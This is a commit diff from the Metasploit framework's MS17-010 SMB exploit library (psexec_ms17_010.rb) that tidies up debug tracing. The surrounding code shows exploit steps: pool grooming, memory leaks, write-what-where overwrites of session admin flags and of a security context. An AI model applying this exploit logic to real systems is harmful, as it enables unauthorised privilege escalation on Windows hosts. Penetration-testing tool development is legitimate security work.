Skip to content

Commit 24a79ae

Browse files
author
zerosum0x0
committed
clean up DBGTRACE
1 parent a321a70 commit 24a79ae

File tree

1 file changed

+13
-26
lines changed

1 file changed

+13
-26
lines changed

lib/msf/core/exploit/smb/client/psexec_ms17_010.rb

Lines changed: 13 additions & 26 deletions
Original file line numberDiff line numberDiff line change
@@ -47,11 +47,10 @@ def eternal_pwn(ip)
4747
fmt = @ctx['PTR_FMT']
4848

4949
# IsNullSession = 0, IsAdmin = 1
50-
write_what_where("\x00\x01", @ctx['session'] + @ctx['SESSION_ISNULL_OFFSET'])
50+
poffset = @ctx['session'] + @ctx['SESSION_ISNULL_OFFSET']
51+
write_what_where("\x00\x01", poffset)
5152

52-
if datastore['DBGTRACE']
53-
vprint_status("Overwrote IsNullSession = 0, IsAdmin = 1")
54-
end
53+
vprint_status("Overwrote IsNullSession = 0, IsAdmin = 1 at 0x#{poffset.to_s(16)}")
5554

5655
modify_token()
5756

@@ -89,18 +88,13 @@ def modify_token()
8988
# read session struct to get SecurityContext address
9089
sessionData = read_data(@ctx['session'], 0x100)
9190

91+
secCtxAddr = sessionData[@ctx['SESSION_SECCTX_OFFSET']..-1].unpack(@ctx['PTR_FMT'])[0]
92+
9293
if datastore['DBGTRACE']
9394
vprint_status("Session Data: #{bin_to_hex(sessionData)}")
9495
vprint_status("session dat len = #{sessionData.length}")
9596
vprint_status("Session ctx offset = #{@ctx['SESSION_SECCTX_OFFSET'].to_s(16)}")
9697
vprint_status("Session ctx data = #{bin_to_hex(sessionData[@ctx['SESSION_SECCTX_OFFSET']..-1])}")
97-
98-
end
99-
#value = leakTrans[0x8..-1].unpack(ptrf * 5) #unpack_from('<'+ptrf*5, leakTrans, 8)
100-
#secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]
101-
secCtxAddr = sessionData[@ctx['SESSION_SECCTX_OFFSET']..-1].unpack(@ctx['PTR_FMT'])[0]
102-
103-
if datastore['DBGTRACE']
10498
vprint_status("secCtxAddr: #{secCtxAddr.to_s(16)}")
10599
end
106100

@@ -160,9 +154,8 @@ def modify_token()
160154

161155
# see FAKE_SECCTX detail at top of the file
162156
write_what_where(@ctx['FAKE_SECCTX'], secCtxAddr)
163-
if datastore['DBGTRACE']
164-
vprint_status("Overwrote fake secctx")
165-
end
157+
158+
vprint_status("Overwrote token SID security context with fake context")
166159
end
167160

168161
end
@@ -290,9 +283,6 @@ def exploit_matched_pairs(pipe_handle)
290283
# groom: srv buffer header
291284
@ctx['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + @ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'], @ctx['POOL_ALIGN'])
292285

293-
if datastore['DBGTRACE']
294-
vprint_status("GROOM_POOL_SIZE: 0x#{@ctx['GROOM_POOL_SIZE'].to_s(16)}")
295-
end
296286

297287
# groom paramters and data is alignment by 8 because it is NT_TRANS
298288
@ctx['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - @ctx['TRANS_SIZE'] # alignment (4)
@@ -301,7 +291,9 @@ def exploit_matched_pairs(pipe_handle)
301291
bridePoolSize = 0x1000 - (@ctx['GROOM_POOL_SIZE'] & 0xfff) - @ctx['FRAG_POOL_SIZE']
302292
@ctx['BRIDE_TRANS_SIZE'] = bridePoolSize - (@ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'])
303293

294+
304295
if datastore['DBGTRACE']
296+
vprint_status("GROOM_POOL_SIZE: 0x#{@ctx['GROOM_POOL_SIZE'].to_s(16)}")
305297
vprint_status("BRIDE_TRANS_SIZE: 0x#{@ctx['BRIDE_TRANS_SIZE'].to_s(16)}")
306298
end
307299

@@ -314,9 +306,8 @@ def exploit_matched_pairs(pipe_handle)
314306
for i in 0..datastore['LEAKATTEMPTS']
315307
reset_extra_multiplex_id()
316308

317-
if datastore['DBGTRACE']
318-
vprint_status("Attempting leak ##{i.to_s}")
319-
end
309+
310+
vprint_status("Attempting leak ##{i.to_s}")
320311

321312
leakInfo = align_transaction_and_leak(pipe_handle)
322313

@@ -702,19 +693,15 @@ def exploit_fish_barrel(pipe_handle)
702693
print_status("<---------------- | Leaving Danger Zone | ---------------->")
703694
print_status("Reading from CONNECTION struct at: 0x#{connection_addr.to_s(16)}")
704695

696+
trans2_addr = inparam_value - @ctx['TRANS_SIZE'] - xTRANS_NAME_LEN
697+
trans1_addr = trans2_addr - xTRANS_CHUNK_SIZE * 2
705698

706699
if datastore['DBGTRACE']
707700
vprint_status("CONNECTION: 0x#{connection_addr.to_s(16)}")
708701
vprint_status("SESSION: 0x#{session_addr.to_s(16)}")
709702
vprint_status("FLINK: 0x#{flink_value.to_s(16)}")
710703
vprint_status("InData: 0x#{indata_value.to_s(16)}")
711704
vprint_status("MID: 0x#{trans2_mid.to_s(16)}")
712-
end
713-
714-
trans2_addr = inparam_value - @ctx['TRANS_SIZE'] - xTRANS_NAME_LEN
715-
trans1_addr = trans2_addr - xTRANS_CHUNK_SIZE * 2
716-
717-
if datastore['DBGTRACE']
718705
vprint_status("TRANS1: 0x#{trans1_addr.to_s(16)}")
719706
vprint_status("TRANS2: 0x#{trans2_addr.to_s(16)}")
720707
end

0 commit comments

Comments
 (0)